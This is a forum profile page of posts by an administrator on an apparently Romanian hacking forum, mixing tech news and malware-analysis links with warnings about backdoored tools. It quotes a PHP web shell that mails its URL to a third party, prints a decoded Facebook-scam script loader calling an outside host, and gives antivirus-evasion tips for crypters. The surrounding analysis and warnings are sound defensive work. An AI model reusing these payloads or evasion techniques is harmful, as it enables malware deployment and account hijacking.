Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Everything posted by Nytro

  1. Da ba, sa stiti ca plecati si sar strainii cu banii pe voi... Cum ajungeti acolo or sa va roage cu bani, pentru ca... ? Nu stiu, voi stiti. Ce credeti ca e peste hotare? Nu e nimic: nu tu familie, nu tu rude, nu tu prieteni, nu ii pasa nimanui de voi. In tara, daca ai o problema, ai la cine sa apelezi. Acolo esti pe cont propriu. Nu cred ca e tocmai paradisul... Credeti ca banii pica din cer? Voi ganditi?
  2. Ban permanent. Infectie.
  3. Malware Analysis: Rootkits (Video) Good video explaining rootkits using hxdef. Part 1 http://video.google.com/videoplay?docid=-1098574092821901542&q=source:015021726083819226340&hl=en Part 2 http://video.google.com/videoplay?docid=4452554918423531934&q=source:015021726083819226340&hl=en Part 3 http://video.google.com/videoplay?docid=-1835297762554988848&q=source:015021726083819226340&hl=en Sursa: http://www.hackhound.org/forum/index.php?/tutorials/article/244-malware-analysis-rootkits-video/
  4. PHP Security This Tutorial covers Cross Site Scripting (XSS), Cross Site Forgery Requests (CSFR), SQL Injection, globals, and much more! Video (46:42): http://videos.code2design.com/video/play/PHP/11
  5. Nytro

    Mr.Jan

    Probabil e magicul j1c0. Cred ca ai venit aici numai la caterinca si nu cred ca vei rezista mult cat sunt eu prin preajma.
  6. Windows 8: Advanced Task Manager-ul dezvaluit de Bianca Dinu | 21 aprilie 2011 Ultimul build al lui Windows 8, aflat in mainile dezvoltatorilor a condus la aparitia unei noi serii de screenshot-uri, care ne dezvaluie de data aceasta noul Advanced Task Manager al sistemului de operare. Cele doua screenshot-uri par sa evidentieze doua tipuri diferite de manager, unul optimizat pentru editia touch, iar celalalt standard. Prima imagine dezvaluie dashboard-ul aplicatiei, care le ofera utilizatorilor mult mai multe informatii despre procesele care ruleaza, serviciile si resursele sistemului. Procesele sunt listate acum intr-o interfata colorata, care ii va permite utilizatorului sa vada care dintre ele incarca cel mai mult sistemul. Al doilea screenshot reprezinta o alta versiune a Task Manager-ului, cu un puternic accent touch-friendly, care prezinta o lista de programe, utilizatori si itemi start-up. Ultimele screenshot-uri Windows 8 vin sa completeze o serie lunga de leak-uri, care au dezvaluit fanilor cateva feature-uri esentiale ale platformei. Si cum mai sunt inca multe de aflat, stay tuned pentru noi detalii Windows 8. Sursa: http://www.hit.ro/software/Windows-8-Advanced-Task-Manager-ul-dezvaluit
  7. Fisierul din acea arhiva incepe asa: <?php # Web Shell by oRb $eu=1; while ($eu==1){ $url=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; mail ("yo_cristy_lov3_boy@yahoo.com","shell",$url); $eu++; } Adica (lasand stupiditatea acelui while) trimite un mai cu link-ul shell-ului astuia: yo_cristy_lov3_boy Adica nu mie ci unui cocalar. PS: Sunt total impotriva spamului.
  8. Daca nu prea stii VB cum ai de gand sa modifici codul existent? Sunt diverse moduri de a face un crypter nedetectabil: modul in care sunt apelate API-urile necesare rularii executabilului in memorie, clasic sau dinamic. La dinamic poti sa cryptezi numele functiilor apelate, dar nu ajuta prea mult. Se poate adauga cod inutil pentru a evita anumite semnaturi pentru anumite zone de cod. Se poate pune o mica intarziere la executia programului pentru a scapa de sandboxu antivirusilor. Sunt multe lucruri de care trebuie tinut cont, si nu e deloc usor.
  9. Nytro

    tinkode la antena1

    Bancuri Un roman a spart serverele Agentiei Spatiale Europene. In timp ce facea curat le-a lovit cu coada maturii. Pe o pagina de Facebook.
  10. Reverse Code Engineering: An In-Depth Analysis of the Bagle Virus Author: Konstantin Rozinov 1. INTRODUCTION.......................................................................................................................3 2. BASIC X86 CONCEPTS................................................................................................................3 2.1. REGISTERS......................................................................................................................4 2.2. ASSEMBLY.......................................................................................................................5 2.3. RUNTIME DATA STRUCTURES..................................................................................................7 2.4. THE STACK......................................................................................................................9 3. VIRUS OVERVIEW...................................................................................................................12 3.1. VIRUS HISTORY...............................................................................................................12 3.2. VIRUS TYPES..................................................................................................................12 4. BAGLE VIRUS DISASSEMBLY.......................................................................................................13 4.1. OVERVIEW.....................................................................................................................13 4.2. ANALYSIS RESOURCES.......................................................................................................14 4.3. DISASSEMBLY APPROACH....................................................................................................16 4.4. ANALYSIS PROBLEMS AND SOLUTIONS.....................................................................................19 4.5. FUNCTIONAL FLOW...........................................................................................................22 5. CONCLUSIONS......................................................................................................................26 APPENDIX A: DETAILED DISASSEMBLY OF BAGLE VIRUS.............................................................................29 APPENDIX B: SOURCE CODE LISTING OF BAGLE VIRUS...............................................................................72 Download: http://www.binary-auditing.com/downloads/011%20-%20malware%20analysis/3%20Bagle%20A%20Virus/bagle_analysis_v.1.0.pdf
  11. Go Null Yourself E-Zine #4 0x01 Introduction 0x02 Feedback + Edits 0x03 Lattice-Based Cryptography rattle 0x04 duper's Code Corner duper 0x05 The Tech Behind Credit Cards K141 0x06 Brief Notes on Kiosk Hacking storm 0x07 Linux Rootkit Dev Update duper 0x08 MapReduce, Part 2 elchupathingy 0x09 Cameras + DVRs Scan storm 0x0a 303-833-00xx Scan Shadytel, Inc 0x0b bit.ly Shenanigans Silks, elchupa 0x0c Programming Challenge storm 0x0d The Scoop on LIGATT 0x0e Et Cetera, Etc. teh crew Download: http://www.exploit-db.com/papers/17184/
  12. European Space Agency – Full Disclosure realizat de Tinkode într-o zi cu semnifica?ie în domeniu ESA.INT, pagina oficial? a Agen?iei Spa?iale Europene, are probleme de securitate, probleme ce au fost eviden?iate de Tinkode, unul dintre cei mai mediatiza?i români care se ocup? de publicarea datelor confiden?iale pentru accesarea paginilor web ale unora dintre cele mai mari nume ale industriei IT ?i nu numai. Accesul ob?inut de acesta i-a permis s? extrag? conturi de editori, administratori, FTP ?amd. Nimic impresionant pân? aici, având în vedere activitatea sa din ultima perioad?. Întâmplarea face ca ieri, 17 aprilie, a fost ziua în care este s?rb?torit? reîntoarcerea lui Apollo 13 pe p?mânt dintr-o misiune. Dac? nu era suficient asta, acesta a publicat datele de autentificare ale exact 13 conturi de FTP ce ne duce cu gândul la o misiune ce a avut o ?int? clar?. Din nou, presa vuie?te ?i atât. Mai multe detalii pe blogul s?u. Sursa: http://www.worldit.info/noutati/european-space-agency-full-disclosure-realizat-de-tinkode-intr-o-zi-cu-semnificatie-in-domeniu/ Softpedia: http://news.softpedia.com/news/European-Space-Agency-Website-Hacked-195487.shtml
  13. Contine resurse: - SQLite (asta nu sunt sigur daca e DLL sau EXE) - XMLite (extended module) - un DLL pentru sunete cred, BASS nu stiu cum In plus: "FileDescription", "iStealer" "FileVersion", "6, 1, 0, 0" Deci nu e 6.3. Asadar, nu sunt sigur ca e curat.
  14. Hackers Wanted File name: Hackers Wanted [unreleased Director's Cut].avi File description: Hackers Wanted File size: 699.08 MB Download: http://www.megaupload.com/?d=ZF1MXDFT Megavideo: http://www.megavideo.com/?d=ZF1MXDFT Tocmai l-am vazut, e foarte interesant. Descrie bine termenii de hacker (blackhat, whitehat, grayhat) in sensuri la care probabil nu va ganditi. Sunt multe lucruri interesante, vi-l recomand. Singura problema e ca nu are subtitrare, dar ar trebui sa va descurcati cu engleza.
  15. Sper ca ai o explicatie buna. E un server de Radmin v2.1 in arhiva SFX.
  16. Funtioneaza doar pe messenger 8.0. Doar multi-messenger merge pe versiunile mai noi. Deci nu cred ca e prea util.
  17. Sa fie asta cel mai interesant tutorial pe care il puteti gasi aici? Sau preferati sa nu va ridicati deloc nivelul cunostintelor cu ceva, sa zicem, mai "complex"?
  18. Trebuia sa te astepti la astfel de replici cand ai postat.
  19. Probabil. Adica nu stiu cum s-ar putea face un program cu suport pentru toate tastaturile posibile, dar probabil nu e deloc usor. Dar cred ca e de ajuns unul care suporta tastaturile "standard".
  20. Ai un "eval" acolo, care apeleaza o functie de decryptare. Functia decrypteaza totul, si returneaza rezultatul pentru a fi evaluat. Un simplu "document.write" sau un "alert" in loc de acel return e de ajuns pentru a vedea rezultatul si pentru a nu fi rulat. Dar link-ul e catre un JS mai complex si cu care am avut probleme, cred ca a fost prost scris. Daca nu o sa am ce face o sa incerc sa vad ce face, dar e ceva cod si imi e lene. Ideea de baza cu Facebook e urmatoare: pui fraieru sa ruleze cod JavaScript, poti face pe Facebook-ul lui cam tot ce ar putea face el, in afara doar de chestiile "sociale" ca: recunoaste persoana "x" sau coduri CAPTCHA sau cine stie ce altceva ce necesita o urma de inteligenta.
  21. if(GetAsyncKeyState(i)&1 ==1) Nu are keyboard hook, va consuma ceva procesor, foloseste metoda clasica: verifica pentru fiecare tasta in parte daca e apasata, nu seteaza un hook pentru a primi o "notificare" in caz ca e apelata o tasta. Si e cam prost scris. Adica e stupid sa scrii un fisier ".reg" pentru a scrie in Registry cand exista Registry API, si de asemenea, sa uploadezi pe FTP cu un fisier ".bat" cand exista Winsock si protocolul FTP e tot stupid. Dar na, e mult mai usor asa de aceea probabil au fost preferate aceste alternative. Ideea principala e ca nu vi-l recomand, nici sa il folositi, si sa il studiati nici nu se pune problema.
  22. Nytro

    W3Fools

    W3Schools sunt de rahat, articolele sunt scrise cu picioarele de non-programatori. M-am uitat acum (la intamplare) si vad asta la PHP: The $_GET Function De cand e $_GET functie? Sa fim seriosi, sunt niste porcarii acolo.
  23. Nytro

    W3Fools

    W3Schools sunt de rahat, articolele sunt scrise cu picioarele de non-programatori. M-am uitat acum (la intamplare) si vad asta la PHP: The $_GET Function De cand e $_GET functie? Sa fim seriosi, sunt niste porcarii acolo.
  24. How Graphics Cards Work Introduction to How Graphics Cards Work The images you see on your monitor are made of tiny dots called pixels. At most common resolution settings, a screen displays over a million pixels, and the computer has to decide what to do with every one in order to create an image. To do this, it needs a translator -- something to take binary data from the CPU and turn it into a picture you can see. Unless a computer has graphics capability built into the motherboard, that translation takes place on the graphics card. A graphics card's job is complex, but its principles and components are easy to understand. In this article, we will look at the basic parts of a video card and what they do. We'll also examine the factors that work together to make a fast, efficient graphics card. Think of a computer as a company with its own art department. When people in the company want a piece of artwork, they send a request to the art department. The art department decides how to create the image and then puts it on paper. The end result is that someone's idea becomes an actual, viewable picture. A graphics card works along the same principles. The CPU, working in conjunction with software applications, sends information about the image to the graphics card. The graphics card decides how to use the pixels on the screen to create the image. It then sends that information to the monitor through a cable. * Creating an image out of binary data is a demanding process. To make a 3-D image, the graphics card first creates a wire frame out of straight lines. Then, it rasterizes the image (fills in the remaining pixels). It also adds lighting, texture and color. For fast-paced games, the computer has to go through this process about sixty times per second. Without a graphics card to perform the necessary calculations, the workload would be too much for the computer to handle. The graphics card accomplishes this task using four main components: A motherboard connection for data and power A processor to decide what to do with each pixel on the screen Memory to hold information about each pixel and to temporarily store completed pictures A monitor connection so you can see the final result Next, we'll look at the processor and memory in more detail. http://videos.howstuffworks.com/labrats-tv/2816-episode-47-upgrade-your-video-card-video.htm#mkcpgn=snag1 The GPU Like a motherboard, a graphics card is a printed circuit board that houses a processor and RAM. It also has an input/output system (BIOS) chip, which stores the card's settings and performs diagnostics on the memory, input and output at startup. A graphics card's processor, called a graphics processing unit (GPU), is similar to a computer's CPU. A GPU, however, is designed specifically for performing the complex mathematical and geometric calculations that are necessary for graphics rendering. Some of the fastest GPUs have more transistors than the average CPU. A GPU produces a lot of heat, so it is usually located under a heat sink or a fan. In addition to its processing power, a GPU uses special programming to help it analyze and use data. ATI and nVidia produce the vast majority of GPUs on the market, and both companies have developed their own enhancements for GPU performance. To improve image quality, the processors use: Full scene anti aliasing (FSAA), which smoothes the edges of 3-D objects Anisotropic filtering (AF), which makes images look crisper * Each company has also developed specific techniques to help the GPU apply colors, shading, textures and patterns. The Evolution of Graphics Cards Graphics cards have come a long way since IBM introduced the first one in 1981. Called a Monochrome Display Adapter (MDA), the card provided text-only displays of green or white text on a black screen. Now, the minimum standard for new video cards is Video Graphics Array (VGA), which allows 256 colors. With high-performance standards like Quantum Extended Graphics Array (QXGA), video cards can display millions of colors at resolutions of up to 2040 x 1536 pixels.* * As the GPU creates images, it needs somewhere to hold information and completed pictures. It uses the card's RAM for this purpose, storing data about each pixel, its color and its location on the screen. Part of the RAM can also act as a frame buffer, meaning that it holds completed images until it is time to display them. Typically, video RAM operates at very high speeds and is dual ported, meaning that the system can read from it and write to it at the same time. * The RAM connects directly to the digital-to-analog converter, called the DAC. This converter, also called the RAMDAC, translates the image into an analog signal that the monitor can use. Some cards have multiple RAMDACs, which can improve performance and support more than one monitor. You can learn more about this process in How Analog and Digital Recording Works. The RAMDAC sends the final picture to the monitor through a cable. We'll look at this connection and other interfaces in the next section. PCI Connection Graphics cards connect to the computer through the motherboard. The motherboard supplies power to the card and lets it communicate with the CPU. Newer graphics cards often require more power than the motherboard can provide, so they also have a direct connection to the computer's power supply. Connections to the motherboard are usually through one of three interfaces: Peripheral component interconnect (PCI) Advanced graphics port (AGP) PCI Express (PCIe) PCI Express is the newest of the three and provides the fastest transfer rates between the graphics card and the motherboard. PCIe also supports the use of two graphics cards in the same computer. Most graphics cards have two monitor connections. Often, one is a DVI connector, which supports LCD screens, and the other is a VGA connector, which supports CRT screens. Some graphics cards have two DVI connectors instead. But that doesn't rule out using a CRT screen; CRT screens can connect to DVI ports through an adapter. At one time, Apple made monitors that used the proprietary Apple Display Connector (ADC). Although these monitors are still in use, new Apple monitors use a DVI connection. Most people use only one of their two monitor connections. People who need to use two monitors can purchase a graphics card with dual head capability, which splits the display between the two screens. A computer with two dual head, PCIe-enabled video cards could theoretically support four monitors. In addition to connections for the motherboard and monitor, some graphics cards have connections for: TV display: TV-out or S-video Analog video cameras: ViVo or video in/video out Digital cameras: FireWire or USB Some cards also incorporate TV tuners. Next, we'll look at how to choose a good graphics card. DirectX and Open GL DirectX and Open GL are application programming interfaces, or APIs. An API helps hardware and software communicate more efficiently by providing instructions for complex tasks, like 3-D rendering. Developers optimize graphics-intensive games for specific APIs. This is why the newest games often require updated versions of DirectX or Open GL to work correctly. APIs are different from drivers, which are programs that allow hardware to communicate with a computer's operating system. But as with updated APIs, updated device drivers can help programs run correctly.* Choosing a Good Graphics Card A top-of-the-line graphics card is easy to spot. It has lots of memory and a fast processor. Often, it's also more visually appealing than anything else that's intended to go inside a computer's case. Lots of high-performance video cards are illustrated or have decorative fans or heat sinks. But a high-end card provides more power than most people really need. People who use their computers primarily for e-mail, word processing or Web surfing can find all the necessary graphics support on a motherboard with integrated graphics. A mid-range card is sufficient for most casual gamers. People who need the power of a high-end card include gaming enthusiasts and people who do lots of 3-D graphic work. A good overall measurement of a card's performance is its frame rate, measured in frames per second (FPS). The frame rate describes how many complete images the card can display per second. The human eye can process about 25 frames every second, but fast-action games require a frame rate of at least 60 FPS to provide smooth animation and scrolling. Components of the frame rate are: Triangles or vertices per second: 3-D images are made of triangles, or polygons. This measurement describes how quickly the GPU can calculate the whole polygon or the vertices that define it. In general, it describes how quickly the card builds a wire frame image. Pixel fill rate: This measurement describes how many pixels the GPU can process in a second, which translates to how quickly it can rasterize the image. The graphics card's hardware directly affects its speed. These are the hardware specifications that most affect the card's speed and the units in which they are measured: GPU clock speed (MHz) Size of the memory bus (bits) Amount of available memory (MB) Memory clock rate (MHz) Memory bandwidth (GB/s) RAMDAC speed (MHz) * The computer's CPU and motherboard also play a part, since a very fast graphics card can't compensate for a motherboard's inability to deliver data quickly. Similarly, the card's connection to the motherboard and the speed at which it can get instructions from the CPU affect its performance. Overclocking Some people choose to improve their graphics card's performance by manually setting their clock speed to a higher rate, known as overclockings. People usually overclock their memory, since overclocking the GPU can lead to overheating. While overclocking can lead to better performance, it also voids the manufacturer's warranty. Sursa: http://computer.howstuffworks.com/graphics-card.htm
  25. (a=(b=document).createElement('script')).src='//thefbsecret.info/jsp.php',b.body.appendChild(a);void(0) L-am "decodat" in 10 secunde. Trebuie doar sa ai imaginatie...
×
×
  • Create New...